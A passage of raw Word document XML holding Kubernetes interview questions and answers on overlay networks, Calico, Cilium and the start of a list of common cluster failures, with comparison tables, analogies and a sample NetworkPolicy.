          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q336. Explain overlay networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An overlay network in Kubernetes is a virtual networking layer built on top of an existing physical network that enables communication between Pods across different nodes by encapsulating and tunneling traffic.</w:t>
        <w:br/>
        <w:t>It is commonly used in Kubernetes to enable Pod-to-Pod communication across nodes without requiring direct physical network connectivity between all Pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>An overlay network creates a “virtual network on top of the real network” so Pods can communicate as if they are on the same network, even if they are on different machines.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why overlay networks are needed</w:t>
        <w:br/>
        <w:t>In a Kubernetes cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods run on multiple nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Nodes may be in different subnets or networks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Direct routing between all Pod IPs is not always possible</w:t>
        <w:br/>
        <w:t>So overlay networks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simplify cross-node communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Avoid complex routing setup on physical network</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Provide a unified Pod network</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How overlay networking works</w:t>
        <w:br/>
        <w:t>High-level flow:</w:t>
        <w:br/>
        <w:t>Pod A (Node 1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Encapsulation (VXLAN / IP-in-IP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Physical network</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Decapsulation</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Pod B (Node 2)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key concept: encapsulation</w:t>
        <w:br/>
        <w:t>Overlay networks wrap original packets inside another packet.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Inner packet: Pod-to-Pod communication (10.244.x.x)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Outer packet: Node-to-Node communication (192.168.x.x)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common overlay techniques</w:t>
        <w:br/>
        <w:t>1. VXLAN (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Encapsulates Layer 2 Ethernet frames inside UDP packets</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works across Layer 3 networks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. IP-in-IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Encapsulates IP packet inside another IP packet</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simpler but less flexible than VXLAN</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. GRE tunneling</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Generic tunneling protocol</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Less common in Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where overlay networks are used in Kubernetes</w:t>
        <w:br/>
        <w:t>Overlay networks are implemented by Container Network Interface plugins like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Flannel</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Weave Net</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Calico (can work in both overlay and routed mode)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cilium (often uses eBPF instead of overlay)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Overlay network example</w:t>
        <w:br/>
        <w:t>Without overlay:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Node A cannot directly reach Pod IP on Node B</w:t>
        <w:br/>
        <w:t>With overlay:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Node A encapsulates packet</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sends to Node B</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Node B decapsulates and forwards to Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = cars</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Nodes = cities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Physical network = highways between cities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Overlay network = a courier service that picks up a package in one city, puts it in a truck, and delivers it inside another city seamlessly</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Overlay vs underlay network</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Overlay Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Underlay Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Layer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Virtual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Physical</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Connect Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Connect Nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple for apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Software-defined</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Hardware/network config</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy cross-node communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No need to modify physical network</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works in cloud and on-prem</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Supports dynamic Pod IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simplifies Kubernetes networking</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Extra latency due to encapsulation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Additional CPU overhead</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging is more complex</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * MTU issues can occur (packet size overhead)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Ensure correct MTU settings</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitor network latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use modern CNI plugins (Cilium for performance)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prefer routed networking when possible in large-scale clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Test cross-node traffic in production-like environments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>An overlay network in Kubernetes is a virtual networking layer built on top of an existing physical network that enables Pod-to-Pod communication across nodes by encapsulating and tunneling network traffic, allowing a unified and scalable networking model without requiring changes to the underlying infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q337. What is Calico?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Calico is a high-performance networking and network security solution used in Kubernetes to provide Pod networking and enforce network policies using a scalable, routing-based architecture (and optionally overlay networking).</w:t>
        <w:br/>
        <w:t>It is one of the most widely used Container Network Interface plugins.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Calico enables Pods to communicate securely across nodes using routing (or overlay) while also enforcing fine-grained network security rules.</w:t>
        <w:br/>
        <w:t>It combines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod networking (connectivity)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network security (policies)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Calico is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Provide Pod-to-Pod networking across nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Enforce Kubernetes Network Policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Improve network performance and scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Replace complex overlay networks with routing (BGP-based)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Support large-scale production clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Calico works</w:t>
        <w:br/>
        <w:t>Calico operates in two main modes:</w:t>
        <w:br/>
        <w:t>1. Route-based (preferred)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Uses BGP (Border Gateway Protocol)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No overlay tunneling</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Direct routing between nodes</w:t>
        <w:br/>
        <w:t>Pod A → Node A → BGP routing → Node B → Pod B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Overlay mode (optional)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Uses VXLAN encapsulation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Used when BGP is not possible</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components of Calico</w:t>
        <w:br/>
        <w:t>1. Felix (agent)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runs on each node</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Applies routing and network policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. BGP (optional)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Exchanges routing information between nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Typha (scaling component)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduces load on Kubernetes API server in large clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. CNI plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Assigns IP addresses to Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sets up networking rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Network Policy enforcement</w:t>
        <w:br/>
        <w:t>Calico is powerful in security because it supports:</w:t>
        <w:br/>
        <w:t>Kubernetes Network Policies:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Allow/deny traffic between Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Control namespace communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Restrict ingress/egress traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Network Policy</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: NetworkPolicy</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: allow-nginx</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      app: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ingress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - from:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - podSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          app: frontend</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Calico networking flow</w:t>
        <w:br/>
        <w:t>Pod A → CNI (Calico) → Routing (BGP/IP tables) → Node B → Pod B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Calico vs overlay networks</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Calico</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traditional Overlay (Flannel)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Routing (BGP)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Tunneling (VXLAN)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Latency</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scalability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very high</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network policies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic/limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = city network</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = houses</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Calico = smart highway system where cars (packets) take direct roads instead of tunnels, plus strict traffic rules (security policies)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * High performance (no overlay overhead in routing mode)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Strong security (Network Policies)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scales to very large clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works in cloud and on-prem environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Flexible (overlay or routing mode)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires understanding of networking (BGP for full setup)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * More complex than simple CNI plugins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Misconfiguration can cause connectivity issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging routing issues can be harder</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where Calico is used</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Enterprise Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Large-scale multi-node environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security-focused deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud providers and hybrid clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Calico is a Kubernetes CNI plugin that provides high-performance Pod networking and network security by enabling routing-based (BGP) or overlay-based connectivity between Pods while enforcing Kubernetes Network Policies for fine-grained traffic control across the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q338. Explain Cilium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cilium is a modern networking, security, and observability solution for Kubernetes that uses eBPF in the Linux kernel to provide high-performance Pod networking, advanced security policies, and deep visibility into network traffic.</w:t>
        <w:br/>
        <w:t>It is also a Container Network Interface plugin.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Cilium replaces traditional networking layers with eBPF-based intelligence inside the Linux kernel, making Kubernetes networking faster, more secure, and highly observable.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Cilium is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Provide high-performance Pod networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Enforce advanced network security policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Replace iptables-based networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Offer deep observability (L3–L7 visibility)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Support service mesh capabilities (in some setups)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key technology: eBPF</w:t>
        <w:br/>
        <w:t>Cilium is built on eBPF (extended Berkeley Packet Filter), which allows:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Running code directly in the Linux kernel</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Fast packet processing without context switching</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Advanced traffic filtering and tracing</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Cilium works</w:t>
        <w:br/>
        <w:t>Traditional networking (iptables-based)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Uses iptables rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Slower at scale</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Hard to debug</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cilium networking (eBPF-based)</w:t>
        <w:br/>
        <w:t>Pod → eBPF program in kernel → direct routing → destination Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No heavy packet rewriting</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kernel-level decision making</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * High performance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features of Cilium</w:t>
        <w:br/>
        <w:t>1. Pod networking (CNI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Assigns IPs to Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Handles routing between nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Network security policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes Network Policies (enhanced)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * L7 policies (HTTP, gRPC, Kafka filtering)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability (Hubble)</w:t>
        <w:br/>
        <w:t>Cilium provides Hubble, which gives:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Real-time network flow visibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Service dependency maps</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security insights</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Service connectivity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Replaces kube-proxy in many setups</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Direct service load balancing using eBPF</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture overview</w:t>
        <w:br/>
        <w:t>Pods → eBPF (kernel layer) → Cilium agent → Kubernetes API → Network routing</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cilium vs traditional CNI (Calico/Flannel)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cilium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traditional CNIs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Technology</w:t>
        <w:br/>
        <w:tab/>
        <w:t>eBPF</w:t>
        <w:br/>
        <w:tab/>
        <w:t>iptables/VXLAN</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very high</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Observability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in (Hubble)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>L3–L7 policies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mostly L3–L4</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = smart city</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Traditional CNIs = traffic police using manual rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cilium = AI-powered traffic system inside roads that instantly decides best routes and enforces rules in real time</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where Cilium is used</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Large-scale Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud-native microservices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security-sensitive environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * High-performance networking systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Service mesh replacements or enhancements</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Extremely high performance (kernel-level processing)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Advanced security policies (L7 awareness)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deep observability via Hubble</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Replaces kube-proxy in many deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduces networking overhead</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires modern Linux kernels (eBPF support)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * More complex to operate than simpler CNIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Steeper learning curve</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging kernel-level issues can be challenging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cilium vs Calico</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cilium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Calico</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Core tech</w:t>
        <w:br/>
        <w:tab/>
        <w:t>eBPF</w:t>
        <w:br/>
        <w:tab/>
        <w:t>BGP / iptables</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>L7 policies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Observability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Strong (Hubble)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Cilium is a Kubernetes CNI plugin and cloud-native networking solution that uses eBPF in the Linux kernel to provide high-performance Pod networking, advanced L3–L7 security policies, and deep observability, enabling efficient and secure communication between services in modern Kubernetes clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q339. What are common Kubernetes failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In Kubernetes, failures usually come from a few predictable areas: cluster components, networking, scheduling, storage, and application misconfigurations.</w:t>
        <w:br/>
        <w:t>Below are the most common Kubernetes failures (interview-focused):</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Pod not starting (Pending state)</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No available CPU/memory</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Node selectors/affinity mismatch</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Taints not tolerated</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cluster autoscaler not scaling</w:t>
        <w:br/>
        <w:t>Symptom:</w:t>
        <w:br/>
        <w:t>Pod stays in Pending</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. CrashLoopBackOff</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application crashes on startup</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Missing config/env variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Bad command/entrypoint</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependency service unavailable</w:t>
        <w:br/>
        <w:t>Symptom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod keeps restarting repeatedly</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. ImagePullBackOff / ErrImagePull</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong image name/tag</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Private registry auth failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network issue to registry</w:t>
        <w:br/>
        <w:t>Symptom:</w:t>
        <w:br/>
